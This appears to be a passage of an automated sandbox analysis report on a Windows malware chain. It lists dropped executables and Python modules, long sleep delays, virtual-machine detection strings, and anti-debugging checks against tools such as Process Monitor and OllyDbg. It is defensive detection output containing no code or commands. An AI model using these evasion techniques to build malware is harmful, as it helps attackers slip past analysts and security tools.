                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015363001\5102d46fb9.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\_queue.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\wOKhy9f[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_keccak.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\random[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Protocol\_scrypt.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\_socket.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_ghash_portable.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_MD2.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\_ctypes.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\_asyncio.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_ocb.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\random[2].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_aes.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_ofb.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_arc2.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\PublicKey\_ec_ws.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\_multiprocessing.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_RIPEMD160.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\select.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_ecb.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015362001\432b30086e.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_eksblowfish.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015130001\EkmIhQM.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\win32api.cp310-win_amd64.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\win32ui.cp310-win_amd64.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015216001\wOKhy9f.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_MD5.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_des.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\charset_normalizer\md__mypyc.cp310-win_amd64.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\_pytransform.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_SHA512.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\python3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_cast.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_ghash_clmul.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_chacha20.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Util\_cpuid_c.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\mfc140u.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_MD4.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\_decimal.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\_bz2.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\pyexpat.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_SHA384.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_blowfish.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015360001\3a4323f24d.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\_ssl.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\_hashlib.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_SHA256.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\_overlapped.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015305001\94CwbGg.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\pythoncom310.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\python310.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_ctr.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\K6UAlAU[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Math\_modexp.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_cfb.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\unicodedata.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015366001\dce9e93496.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[3].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\_win32sysloader.cp310-win_amd64.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\_cffi_backend.cp310-win_amd64.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_poly1305.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\_lzma.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_ARC4.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI85002\_sqlite3.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\94CwbGg[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeAPI coverage: 5.2 %
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8584Thread sleep count: 51 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8584Thread sleep time: -102051s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8560Thread sleep count: 139 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8560Thread sleep time: -278139s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8540Thread sleep count: 417 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8540Thread sleep time: -12510000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8572Thread sleep count: 87 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8572Thread sleep time: -174087s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8568Thread sleep count: 82 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8568Thread sleep time: -164082s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8568Thread sleep count: 1775 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8568Thread sleep time: -3551775s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8556Thread sleep count: 2006 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8556Thread sleep time: -4014006s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8572Thread sleep count: 725 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8572Thread sleep time: -1450725s >= -30000sJump to behavior
                        Source: C:\Windows\System32\cmd.exe TID: 11240Thread sleep time: -8001000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\cmd.exe TID: 11240Thread sleep time: -1748000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe TID: 4304Thread sleep time: -180000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe TID: 4304Thread sleep time: -30000s >= -30000s
                        Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 6500Thread sleep count: 136 > 30
                        Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 6500Thread sleep time: -136000s >= -30000s
                        Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 4112Thread sleep count: 5761 > 30
                        Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 4112Thread sleep time: -5761000s >= -30000s
                        Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 4112Thread sleep count: 3586 > 30
                        Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 4112Thread sleep time: -3586000s >= -30000s
                        Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5804Thread sleep count: 73 > 30
                        Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5804Thread sleep time: -73000s >= -30000s
                        Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 11876Thread sleep count: 8979 > 30
                        Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 11876Thread sleep time: -8979000s >= -30000s
                        Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 11876Thread sleep count: 892 > 30
                        Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 11876Thread sleep time: -892000s >= -30000s
                        Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 8520Thread sleep count: 72 > 30
                        Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 8520Thread sleep time: -72000s >= -30000s
                        Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 11848Thread sleep count: 8310 > 30
                        Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 11848Thread sleep time: -8310000s >= -30000s
                        Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 11848Thread sleep count: 1565 > 30
                        Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 11848Thread sleep time: -1565000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                        Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                        Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B57978 FindFirstFileW,FindFirstFileW,free,12_2_00B57978
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B5881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,12_2_00B5881C
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B5B5E0 GetSystemInfo,12_2_00B5B5E0
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                        Source: axplong.exe, axplong.exe, 00000008.00000000.269464637148.0000000000820000.00000080.00000001.01000000.0000000A.sdmp, axplong.exe, 00000008.00000002.269514525267.0000000000820000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                        Source: LoaderClient.exe, 0000002E.00000003.269803361016.0000023A40628000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
                        Source: explorer.exe, 00000023.00000002.269554816675.0000000000DFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW\
                        Source: dwVrTdy.exe, 00000028.00000002.269664887145.0000025635668000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269654360187.0000025635668000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269648294839.0000025635668000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269647087096.0000025635668000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW|
                        Source: b1dc05533c.exe, 00000014.00000002.269672784820.0000000001257000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                        Source: b1dc05533c.exe, 00000014.00000002.269672784820.0000000001257000.00000004.00000020.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000002.269672784820.000000000121C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000023.00000002.269554816675.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000002.269640823894.0000022432659000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000002.269640823894.0000022432605000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000002.269664887145.0000025635668000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269654360187.0000025635668000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269648294839.0000025635668000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269647087096.0000025635668000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000002.269641172734.00000247ADEB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: AzVRM7c.exe, 00000029.00000002.269641172734.00000247ADE96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0A
                        Source: dwVrTdy.exe, 00000026.00000002.269640823894.0000022432659000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW5)
                        Source: LoaderClient.exe, 0000002F.00000003.269851671317.00000178EA352000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllHhn
                        Source: PING.EXE, 00000027.00000002.269584208485.00000242D46E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllEET
                        Source: file.exe, 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.268896872404.0000000000BBC000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.268898160888.0000000000BBC000.00000040.00000001.01000000.00000007.sdmp, 0d47c4c34f.exe, 00000005.00000001.269401411262.00000000002A0000.00000080.00000001.01000000.00000009.sdmp, 0d47c4c34f.exe, 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmp, 0d47c4c34f.exe, 00000005.00000000.269400467979.00000000002A0000.00000080.00000001.01000000.00000009.sdmp, axplong.exe, 00000006.00000002.269506972578.0000000000820000.00000040.00000001.01000000.0000000A.sdmp, axplong.exe, 00000006.00000000.269456458173.0000000000820000.00000080.00000001.01000000.0000000A.sdmp, axplong.exe, 00000008.00000000.269464637148.0000000000820000.00000080.00000001.01000000.0000000A.sdmp, axplong.exe, 00000008.00000002.269514525267.0000000000820000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                        Source: dwVrTdy.exe, 00000028.00000002.269664887145.00000256355C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                        Source: PING.EXE, 00000021.00000002.269574952643.00000241A6F39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI call chain: ExitProcess graph end nodegraph_2-10070
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI call chain: ExitProcess graph end nodegraph_2-10057
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI call chain: ExitProcess graph end nodegraph_3-10760
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeAPI call chain: ExitProcess graph end nodegraph_8-11365
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeAPI call chain: ExitProcess graph end nodegraph_8-11422
                        Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: regmonclass
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: gbdyllo
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: procmon_window_class
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: ollydbg
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: filemonclass
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: NTICE
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SICE
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SIWVID
                        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
